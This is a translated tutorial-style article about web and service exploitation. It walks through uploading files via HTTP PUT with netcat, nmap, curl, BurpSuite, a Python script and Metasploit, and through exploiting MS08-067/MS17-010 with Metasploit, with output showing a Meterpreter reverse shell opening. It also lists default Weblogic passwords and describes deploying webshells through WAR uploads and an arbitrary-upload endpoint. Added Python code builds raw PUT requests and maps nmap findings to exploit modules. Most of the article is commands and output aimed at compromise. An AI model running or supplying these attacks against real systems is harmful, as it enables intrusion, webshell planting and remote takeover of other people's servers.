Shulou (shulou.com), SLTechnology News&Howtos, Network Security section. 05/31 report; updated 2025-04-07.
In this issue the editor presents an example analysis of Web vulnerability exploitation techniques ("postures"). The article is rich in content and approaches the topic from a professional point of view; I hope you take something away after reading it.
1. Exploiting the HTTP PUT method
PUT is the HTTP method for creating or replacing a resource, and WebDAV uses it for file management. If the operator has not changed the Web server's default configuration and the server still accepts the method, an attacker can write files into the server's file system at will.
1.1 Netcat uses the PUT method
Netcat, usually shortened to "nc", is a well-known network tool, called the "Swiss Army knife" of penetration testing. It can be used for port listening, port scanning, remote file transfer, remote shells and more.
After learning that the Web service has the PUT method enabled, connect and type the request by hand:
nc IP PORT
PUT /dav/hack.txt HTTP/1.1
Host: IP
Press Enter twice to end the headers. The response carries status code 201 (Created), which means hack.txt has been created in the /dav/ directory. Because no Content-Length header was sent, the server stores an empty file; to give the file content, add a Content-Length header equal to the body size and type the body after the blank line.
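The same exchange written out in code, as an added example that is not code from the original article: it builds the raw request bytes the netcat session types by hand, including the Content-Length the manual session omits, and parses the reply so the 201 check is done in code rather than by eye. The host 192.168.40.4, the path /dav/hack.txt and the server replies are assumptions constructed for the example so that it runs offline; send_raw() performs the same exchange against a real host.

```python
"""Raw HTTP/1.1 PUT exchange, as the netcat session above performs it.

Added example, not code from the original article. The host, path and file
body are assumptions; the server replies below are constructed so the script
runs offline. send_raw() performs the exchange against a real host.
"""
import socket


def build_options_request(host, path):
    """OPTIONS asks the server which methods it accepts on `path` (Allow header)."""
    return (
        f"OPTIONS {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def build_put_request(host, path, body, content_type="text/plain"):
    """Build the bytes netcat sends. Content-Length is what the manual netcat
    session leaves out: with no body declared the server stores an empty file,
    so declare the length whenever content follows the headers."""
    headers = (
        f"PUT {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: {content_type}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return headers.encode("ascii") + body


def status_code(response):
    """Status code from the status line, e.g. 201 for 'HTTP/1.1 201 Created'."""
    return int(response.split(b"\r\n", 1)[0].split()[1])


def header(response, name):
    """Value of the first header called `name` (case-insensitive), or None."""
    head = response.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:
        key, sep, value = line.partition(b":")
        if sep and key.strip().lower() == name.lower().encode("ascii"):
            return value.decode("ascii", "replace").strip()
    return None


def allowed_methods(options_response):
    """Methods the server advertises in the Allow header of an OPTIONS reply."""
    allow = header(options_response, "Allow") or ""
    return {m.strip().upper() for m in allow.split(",") if m.strip()}


def put_created(put_response):
    """201 = new resource created, 204 = existing resource overwritten;
    anything else (401, 403, 405 ...) means the PUT was refused."""
    return status_code(put_response) in (201, 204)


def send_raw(host, port, request, timeout=5.0):
    """Send a raw request the way `nc host port` does and return the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed replies (assumption: modelled on a WebDAV-enabled Apache).
OPTIONS_REPLY_DAV = (
    b"HTTP/1.1 200 OK\r\n"
    b"DAV: 1,2\r\n"
    b"Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,PUT,LOCK,UNLOCK\r\n"
    b"Content-Length: 0\r\n\r\n"
)
OPTIONS_REPLY_PLAIN = b"HTTP/1.1 200 OK\r\nAllow: OPTIONS,GET,HEAD,POST\r\nContent-Length: 0\r\n\r\n"
PUT_REPLY_CREATED = (
    b"HTTP/1.1 201 Created\r\n"
    b"Location: http://192.168.40.4/dav/hack.txt\r\n"
    b"Content-Length: 0\r\n\r\n"
)
PUT_REPLY_REFUSED = b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET,HEAD,POST\r\nContent-Length: 0\r\n\r\n"


if __name__ == "__main__":
    req = build_put_request("192.168.40.4", "/dav/hack.txt", b"hack completed\n")
    print(req.decode("ascii"))
    print("PUT advertised:", "PUT" in allowed_methods(OPTIONS_REPLY_DAV))
    print("created:", put_created(PUT_REPLY_CREATED), "refused:", put_created(PUT_REPLY_REFUSED))
```

The Allow header returned by OPTIONS is only advisory: a server may accept PUT without listing it, or list it and still refuse, so the PUT itself is the real test. A 201 means a new file was created; a 204 means an existing file was overwritten.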
1.2 Nmap uses the PUT method
Command:
nmap -p PORT IP --script http-put --script-args http-put.url='/dav/test.php',http-put.file='/root/test.php'
Command explanation:
--script http-put // select the http-put NSE script, which uploads a file with the HTTP PUT method
--script-args // set the script's parameters 1 and 2
http-put.url='/dav/test.php' // parameter 1: the target path to upload to
http-put.file='/root/test.php' // parameter 2: the local file to upload
The figure shows the upload succeeding through the Nmap script.
1.3 BurpSuite uses the PUT method
Using the everyday BurpSuite workflow, browse to the upload target path and intercept the request, change the request method to PUT and the upload path to the file name you want, write the file content into the request body, and send the packet to the Web server.
The server's response shows that the file was created successfully.
1.4 cURL uses the PUT method
cURL is a command-line tool for transferring data with URL syntax; it uploads or downloads data through a specified URL and displays the result. The "c" in curl stands for client, and URL is the uniform resource locator.
The command to create a file through the PUT method is as follows:
Command 1:
curl -i -X PUT -H "Content-Type: text/plain; charset=utf-8" -d "hack completed" http://192.168.40.4/dav/hack.php
Command explanation:
-i/--include // include the response headers in the output
-X/--request // specify the request method, here PUT
-H/--header // send the custom header "Content-Type: text/plain; charset=utf-8" to the server
-d/--data // send the given text as the request body, which becomes the content of http://192.168.40.4/dav/hack.php (on its own -d implies POST; with -X PUT the request is a PUT)
Command 2:
curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"F:\1.php" http://192.168.40.4/dav/hack.php
Command explanation:
-d @"filename" // read the request body from a file. Note that -d strips carriage returns and newlines from the file; use --data-binary @"filename" to send it byte for byte, or -T "filename", which uploads the file with PUT by default.
1.5 The QuickPut script uses the PUT method
QuickPut is a Python command-line tool that uploads a file to a server through the HTTP PUT method.
Upload command:
python2 QuickPut.py F:\1.php http://192.168.40.4/dav/hack1.php
Command explanation:
python2 QuickPut.py <local file> <target URL> // the first argument is the local file to upload, the second is the URL the file is written to
1.6 Metasploit uses the PUT method
The Metasploit auxiliary module auxiliary/scanner/http/http_put can upload and delete files over the PUT method.
Command:
use auxiliary/scanner/http/http_put // load the http_put module
show options // display the module parameters
set RHOSTS 192.168.40.4 // set the target IP
set PATH /dav/ // set the target directory
set FILENAME msf.php // set the name of the uploaded file
set FILEDATA file://root/test.php // read the content to upload from a local file (the file: prefix)
run // run the module (the original also sets "payload php/meterpreter/reverse_tcp", but an auxiliary module takes no payload, so that line has no effect; the uploaded content comes entirely from FILEDATA)
The returned result shows that the file was uploaded successfully.
2. SMB vulnerability exploitation
If port scanning during information gathering finds that the host has ports 139 and 445 open and the banner identifies Microsoft Windows, think of the SMB vulnerabilities associated with those ports, such as MS17-010 and MS08-067.
Vulnerability detection
Command:
nmap --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse -sT IP
nmap --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse -sT IP
Command explanation:
--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse // use the Nmap MS08-067 vulnerability check script (the short form --script smb-vuln-ms08-067 also works)
-sT // TCP connect scan
If the output is:
smb-vuln-ms08-067:
  VULNERABLE:
  Microsoft Windows system vulnerable to remote code execution (MS08-067)
    State: VULNERABLE
    IDs:  CVE:CVE-2008-4250
          The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization.
    Disclosure date: 2008-10-23
    References:
      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
then the host has the MS08-067 vulnerability; MS17-010 is checked in the same way.
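A small triage helper, added here as an example and not part of the original article: it parses the text nmap prints for the smb-vuln-* scripts (the listing above, with or without nmap's "|" gutter) into one finding per host and script, pulls out the State line and the CVE identifiers, and pairs each VULNERABLE finding with the Metasploit module used in the next section. The scan text is constructed for the example, and the script-to-module table is an assumption about which module a tester would reach for next.

```python
"""Triage nmap smb-vuln-* script output into structured findings.

Added example, not part of the original article. The sample scan text is
constructed; the NEXT_STEP table is an assumption (module names as found in
current Metasploit), not something the article states.
"""
import re
from dataclasses import dataclass, field

# Assumed mapping from NSE script to the exploit module a tester would try next.
NEXT_STEP = {
    "smb-vuln-ms08-067": "exploit/windows/smb/ms08_067_netapi",
    "smb-vuln-ms17-010": "exploit/windows/smb/ms17_010_eternalblue",
}

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^(smb-vuln-[\w-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class Finding:
    host: str
    script: str
    state: str = "UNKNOWN"      # nmap's State line, e.g. VULNERABLE, NOT VULNERABLE
    cves: list = field(default_factory=list)
    note: str = ""              # text after the script name (error messages)

    def msf_module(self):
        """Exploit module to try next, only for hosts nmap calls VULNERABLE."""
        if self.state.startswith("VULNERABLE"):
            return NEXT_STEP.get(self.script)
        return None


def _script_text(raw):
    """Remove nmap's '| ' / '|_' gutter if present, plus surrounding whitespace."""
    line = raw.strip()
    if line.startswith("|"):
        line = line[1:]
        if line.startswith("_"):
            line = line[1:]
    return line.strip()


def parse_smb_vuln(scan_output):
    """One Finding per (host, smb-vuln script) seen in the scan text."""
    findings, host, current = [], "?", None
    for raw in scan_output.splitlines():
        m = HOST_RE.match(raw)
        if m:
            host, current = m.group(1), None
            continue
        if not raw.strip():
            current = None          # blank line ends a host's script block
            continue
        text = _script_text(raw)
        m = SCRIPT_RE.match(text)
        if m:
            current = Finding(host=host, script=m.group(1), note=m.group(2).strip())
            findings.append(current)
            continue
        if current is None:
            continue
        if text.startswith("State:"):
            current.state = text.split(":", 1)[1].strip()
        for cve in CVE_RE.findall(text):      # IDs line and reference URLs
            if cve not in current.cves:
                current.cves.append(cve)
    return findings


def triage(scan_output):
    """(host, script, state, cves, next_module) rows, exploitable hosts first."""
    rows = [(f.host, f.script, f.state, tuple(f.cves), f.msf_module())
            for f in parse_smb_vuln(scan_output)]
    return sorted(rows, key=lambda r: r[4] is None)


# Constructed scan output: one vulnerable host, one the script could not test.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.40.4
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    Disclosure date: 2017-03-14

Nmap scan report for 192.168.40.5
Host is up (0.0012s latency).

Host script results:
|_smb-vuln-ms17-010: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
"""

if __name__ == "__main__":
    for row in triage(SAMPLE_SCAN):
        print(row)
```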
Vulnerability exploitation
The MSF SMB exploit modules are used for MS08-067 and MS17-010. Set RHOST (RHOSTS in current Metasploit versions) to the target and LHOST to the address the reverse handler listens on.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST IP
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on LHOST:LPORT
[*] IP:445 - Automatically detecting the target...
[*] IP:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*] IP:445 - Selected Target: Windows 2000 Universal
[*] IP:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to IP
[*] Meterpreter session 2 opened (LHOST:LPORT -> IP:port)
meterpreter >
MS17-010 is exploited in the same way with its own module.
3. Weblogic vulnerability exploitation
The Weblogic Server application server is often encountered in penetration testing. On seeing Weblogic Server, think of the many CVEs the particular version may carry, such as weak passwords on the administration console, Java deserialization vulnerabilities and arbitrary file upload vulnerabilities. Below are the ways to exploit the various Weblogic vulnerabilities.
3.1 Weak password for console login
Common weak Weblogic Server console credentials (username/password):
weblogic/weblogic
weblogic/weblogic1
weblogic/weblogic10
weblogic/weblogic123
If one of them works, log in to the application server's administration console and upload a WAR package containing a webshell.
After the upload, deploy the WAR package in the application server.
Once the WAR package is uploaded and deployed successfully, the webshell (a full-featured "big horse" shell) can be accessed.
3.2 Java deserialization vulnerability
The CVEs can be detected directly with detection scripts and then exploited with exp scripts chosen according to the vulnerability identifier.
The Weblogic vulnerability detection script is powerful: it detects a variety of CVEs, finds the console path, checks for SSRF and weak passwords, and can be extended later.
Detection and exploitation can also be done directly with a Java deserialization exploitation tool. Such tools provide vulnerability detection, command execution, file upload and batch checking.
3.3 Weblogic arbitrary file upload vulnerability
Brute-force the Weblogic login to obtain the credentials.
With the login password, the server name and the random-character directory name in hand, construct the upload POC and upload a test file.
Send the following data to the /bea_wls_deployment_internal/DeploymentService path (the request data itself is not reproduced in this text).
The server returns an upload-success message together with the absolute path of the file.
Accessing the uploaded file's path displays its contents:
http://IP/bea_wls_deployment_internal/shell.jsp
The above is the example analysis of Web vulnerability exploitation techniques shared by the editor. If you have similar questions, refer to the analysis above; to learn more, follow the industry information channel.